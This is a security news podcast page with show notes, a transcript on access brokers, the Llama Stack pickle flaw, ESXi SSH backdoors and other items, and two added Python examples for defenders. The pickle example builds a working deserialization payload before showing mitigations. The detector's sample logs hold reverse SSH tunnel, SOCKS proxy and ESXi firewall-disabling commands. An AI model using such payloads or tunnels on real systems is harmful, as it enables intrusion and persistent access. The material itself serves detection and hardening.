SANS ISC Stormcast, Jan 27, 2025: Access Brokers; Llama Stack Vuln; ESXi SSH Tunnels; Zyxel Boot Loops; Subaru StarLeak
If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9296.mp3

Guest Diary: How Access Brokers Maintain Persistence
Explore how cybercriminals utilize access brokers to persist within networks and the impact this has on organizational security.
https://isc.sans.edu/forums/diary/Guest+Diary+How+Access+Brokers+Maintain+Persistence/31600/
Critical Vulnerability in Meta's Llama Stack (CVE-2024-50050)
A deep dive into CVE-2024-50050, a critical vulnerability affecting Meta's Llama Stack, with exploitation details and mitigation strategies.
https://www.oligo.security/blog/cve-2024-50050-critical-vulnerability-in-meta-llama-llama-stack
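To make the deserialization point concrete, the following is an added Python example written for this page; it is not code from Meta's Llama Stack or from the Oligo write-up. The Llama Stack bug is a Python pickle deserialization issue on data read from a socket; this demo reproduces the mechanism in memory (the `_record` side effect and the `Malicious` class are stand-ins for `os.system` and a real payload) and shows two hardened receivers: an allow-listing unpickler and a plain JSON schema. The request shape `{"prompt": str, "max_tokens": int}` is an assumption for the demo.

```python
import io
import json
import pickle

# Constructed demo: appending to this list stands in for "attacker code ran".
EXECUTED = []


def _record(marker):
    """Stand-in for os.system(...): called as a side effect of unpickling."""
    EXECUTED.append(marker)
    return marker


class Malicious:
    """Pickles to a call of _record(...) instead of to an ordinary object.

    Any importable callable can be placed here, including os.system, which is
    exactly why pickle.loads() on untrusted input is remote code execution.
    """

    def __reduce__(self):
        return (_record, ("code ran during unpickle",))


def build_malicious_payload() -> bytes:
    return pickle.dumps(Malicious())


def build_benign_payload() -> bytes:
    # Plain containers pickle without any GLOBAL opcode.
    return pickle.dumps({"prompt": "hi", "max_tokens": 16})


def unsafe_receive(payload: bytes):
    """Vulnerable pattern: bytes straight off the network into pickle.loads()."""
    return pickle.loads(payload)


class RestrictedUnpickler(pickle.Unpickler):
    """Mitigation 1: refuse every global lookup unless explicitly allow-listed.

    pickle calls find_class() for each GLOBAL/STACK_GLOBAL opcode, so the
    reference to _record (or os.system) is rejected before it can be called.
    Extend ALLOWED only with classes you genuinely must reconstruct.
    """

    ALLOWED = frozenset()

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def restricted_receive(payload: bytes):
    return RestrictedUnpickler(io.BytesIO(payload)).load()


# Mitigation 2: do not use a code-carrying format at all.
# Assumed request schema for the demo.
REQUIRED_FIELDS = {"prompt": str, "max_tokens": int}


def safe_receive(payload: bytes) -> dict:
    try:
        msg = json.loads(payload.decode("utf-8"))
    except ValueError as exc:  # UnicodeDecodeError and JSONDecodeError both derive from it
        raise ValueError("request is not valid UTF-8 JSON") from exc
    if not isinstance(msg, dict) or set(msg) != set(REQUIRED_FIELDS):
        raise ValueError("unexpected request shape")
    for name, expected in REQUIRED_FIELDS.items():
        if type(msg[name]) is not expected:  # exact type: bool is not accepted as int
            raise ValueError(f"{name} must be {expected.__name__}")
    if not 1 <= msg["max_tokens"] <= 4096:
        raise ValueError("max_tokens out of range")
    return msg


if __name__ == "__main__":
    payload = build_malicious_payload()
    print("unsafe:", unsafe_receive(payload), EXECUTED)
    for receiver in (restricted_receive, safe_receive):
        try:
            receiver(payload)
        except (pickle.UnpicklingError, ValueError) as exc:
            print(receiver.__name__, "rejected:", exc)
    print("restricted, benign:", restricted_receive(build_benign_payload()))
    print("safe:", safe_receive(b'{"prompt": "hello", "max_tokens": 16}'))
```

The allow-listing unpickler is the minimal fix when a wire format cannot be changed overnight; the JSON receiver is the one to migrate to, because the input then cannot name a callable at all and the remaining validation is ordinary type and range checking.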
ESXi Ransomware and SSH Tunneling Defense Strategies
Learn how to fortify your infrastructure against ransomware targeting ESXi environments, focusing on SSH tunneling and proactive measures.
https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/
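As an added example (written for this page, not code from Sygnia), here is a small detector for the kind of SSH tunnelling described in that post, run over constructed ESXi shell history lines. The line layout imitates `/var/log/shell.log` but is an assumption for the demo, as are the sample commands, the hosts (documentation-range addresses) and the default trusted management networks; adjust those to your environment. It flags `ssh` invocations that set up forwards (`-R`, `-L`, `-D`, `-w`), run without a remote command (`-N`), background themselves (`-f`), use a non-standard port, disable host key checking, or connect outside the trusted ranges, and it also flags commands that weaken the ESXi firewall.

```python
import ipaddress
import re
import shlex
from dataclasses import dataclass

# Constructed sample of ESXi shell history (format assumed for the demo).
SAMPLE_SHELL_LOG = """\
2025-01-24T03:12:09.120Z In(14) shell[2100411]: [root]: esxcli system version get
2025-01-24T03:13:41.553Z In(14) shell[2100411]: [root]: esxcli network firewall ruleset set -e false -r sshServer
2025-01-24T03:14:02.001Z In(14) shell[2100411]: [root]: ssh -fN -R 127.0.0.1:10022:127.0.0.1:22 tunnel@203.0.113.45
2025-01-24T03:20:17.880Z In(14) shell[2100450]: [root]: ls /vmfs/volumes
2025-01-24T03:25:55.310Z In(14) shell[2100450]: [root]: nohup ssh -o StrictHostKeyChecking=no -D 1080 -p 443 ops@198.51.100.7 &
2025-01-24T03:30:00.000Z In(14) shell[2100450]: [root]: vim-cmd vmsvc/getallvms
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+\S+\s+shell\[(?P<pid>\d+)\]:\s+\[(?P<user>[^\]]+)\]:\s+(?P<cmd>.*)$"
)
TUNNEL_FLAGS = {"-R": "reverse tunnel", "-L": "local forward",
                "-D": "SOCKS proxy", "-w": "tun device"}
ARG_FLAGS = {"-R", "-L", "-D", "-w", "-p", "-o", "-i", "-l", "-J", "-F", "-b"}
DEFAULT_TRUSTED = ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")  # assumed


@dataclass
class Finding:
    ts: str
    user: str
    command: str
    reasons: list


def analyze_ssh(tokens, trusted_nets):
    """Return reasons an ssh command looks like a tunnel/backdoor, or []."""
    names = [t.rsplit("/", 1)[-1] for t in tokens]   # /usr/bin/ssh -> ssh
    if "ssh" not in names:
        return []
    args = tokens[names.index("ssh") + 1:]
    reasons, dest, i = [], None, 0
    while i < len(args):
        tok = args[i]
        if tok in ARG_FLAGS and i + 1 < len(args):
            val = args[i + 1]
            if tok in TUNNEL_FLAGS:
                reasons.append(f"{TUNNEL_FLAGS[tok]} ({tok} {val})")
            elif tok == "-p" and val != "22":
                reasons.append(f"non-standard port {val}")
            elif tok == "-o" and "stricthostkeychecking=no" in val.lower():
                reasons.append("host key checking disabled")
            i += 2
            continue
        if tok.startswith("-") and not tok.startswith("--"):
            if "N" in tok[1:]:
                reasons.append("no remote command (-N), tunnel-only session")
            if "f" in tok[1:]:
                reasons.append("backgrounded (-f)")
        elif dest is None and tok != "&":
            dest = tok                                  # first positional: [user@]host
        i += 1
    if dest:
        host = dest.rsplit("@", 1)[-1]
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            addr = None                                 # hostname: resolve out of band
        if addr is not None and not any(addr in net for net in trusted_nets):
            reasons.append(f"destination {host} outside trusted management networks")
    return reasons


def find_suspicious(log_text, trusted_cidrs=DEFAULT_TRUSTED):
    nets = [ipaddress.ip_network(c) for c in trusted_cidrs]
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        cmd = m["cmd"]
        try:
            tokens = shlex.split(cmd)
        except ValueError:
            tokens = cmd.split()
        reasons = analyze_ssh(tokens, nets)
        if cmd.startswith("esxcli network firewall") and "false" in tokens:
            reasons.append("ESXi firewall weakened")
        if reasons:
            findings.append(Finding(m["ts"], m["user"], cmd, reasons))
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_SHELL_LOG):
        print(f.ts, f.user, f.command)
        for r in f.reasons:
            print("   -", r)
```

Shell history only catches interactive use; pair this with the host's authentication log and with netflow for outbound 22/443 from hypervisors, since a tunnel started from a dropped script or a cron entry never shows up as a typed command.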
Zyxel USG FLEX/ATP Series Application Signature Recovery Steps
Addressing issues with Zyxel’s USG FLEX/ATP Series application signatures as of January 24, 2025, with a detailed recovery guide.
https://support.zyxel.eu/hc/en-us/articles/24159250192658-USG-FLEX-ATP-Series-Recovery-Steps-for-Application-Signature-Issue-on-January-24th-2025
Subaru Starlink Vulnerability Exposed Cars to Remote Hacking
Discussing how a vulnerability in Subaru’s Starlink system left vehicles susceptible to remote exploitation and the steps taken to resolve it.
https://www.securityweek.com/subaru-starlink-vulnerability-exposed-cars-to-remote-hacking/
Podcast Transcript
Hello and welcome to the Monday, January 27th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich and today I'm recording from Jacksonville, Florida.

At the Internet Storm Center we had another diary created by one of our undergraduate interns. This time it was Joseph Flint writing about how access brokers are maintaining persistence. Access brokers are just breaking into systems and then selling access to these systems to others, like for example ransomware actors, or really whoever needs a botnet for whatever. So it's really the initial phase of your malware economy. One example that Joseph is pointing out here is SystemBC. That's a botnet that's often associated with these access brokers, and he shows how it reflects itself in our honeypots: some of the specific URLs related to SystemBC that people are scanning for. But then also how to prevent infection and how to detect infection, which should not really be all that difficult. There are plenty of intrusion detection rules out there, as Joseph points out. As well, of course, usually these access brokers are using fairly low-level and easy vulnerabilities. They're often using weak passwords and well-known web application vulnerabilities. So some basic system hardening, and of course patching, keeping your system up to date, goes a long way to prevent these initial infections.

And everything related to AI of course is still getting a lot of news. It should get a lot of news, given the rapid adoption of AI tools everywhere. One way you adopt these AI tools is by using various frameworks to create applications around this. One example here is Meta-Llama or the Llama Stack. Of course that comes from Meta, who is behind the Llama AI model, a fairly popular model to include in your applications. The Meta-Llama part of this stack has a deserialization vulnerability that does allow the execution of arbitrary code. So if you're writing tools for these fancy new AI models, please don't forget good old vulnerabilities, deserialization in particular, since these tools often have to deal with large amounts of unstructured input, which of course tends to be quite difficult to validate. Well, as so often, we have a little bit of controversy here around the severity of this vulnerability. Snyk rates it as a 9.3, so critical, while Meta only rates it as a 6.3, or medium. I think it really depends on how you're using these components. So definitely look at the vulnerability and see how it would possibly affect your software.

Sygnia wrote up a blog post with some of their observations from recent attacks against VMware ESXi. VMware has been a huge target, in particular for ransomware gangs. Of course, if you are able to access the hypervisor, you often essentially own the entire enterprise. Well, what the blog post here by Sygnia is focusing on is the SSH backdoor being deployed by some of these ransomware gangs. Definitely worthwhile reading this, just to look for indicators of compromise and any sort of techniques that you should be looking for here. I actually just had last week a student with a research paper that is looking into the detection of odd SSH traffic like this. Hope to get them on the podcast in the future. But either way, pay attention to SSH connections. And this is certainly a good read if you're using VMware ESXi and if you're worried about ransomware actors taking it over, which is definitely something that you should be worried about.

And if you are using a Zyxel firewall, particularly the USG FLEX and ATP series, you may be affected by a bad signature update that causes these devices to get stuck in a reboot loop. In the show notes I'll link to the advisory. The sad part here is the only way you're going to recover the device is via a serial console cable, which of course typically then requires on-site access.

And then a couple of listeners asked about the Subaru Starlink vulnerability. I haven't really covered it much, in part because the real vulnerability here is just a relatively straightforward password reset vulnerability in their web portal that then allows you to reset passwords, meaning you can then access the account whose password you reset. This is sort of a not very spectacular web application vulnerability. The real problem here is the amount of access you're getting to vehicle data. Apparently anyone with admin privileges to this application will have access to at least a year's worth of location data and the like for the vehicles. So the problem here, I think, is more how much data is being collected versus the actual vulnerability. And just a little side note: Starlink just happens to be the name of this particular infotainment system, not related to the satellite service provider Starlink.

Well, and this is it for today. Thanks for listening, and talk to you again tomorrow. Bye.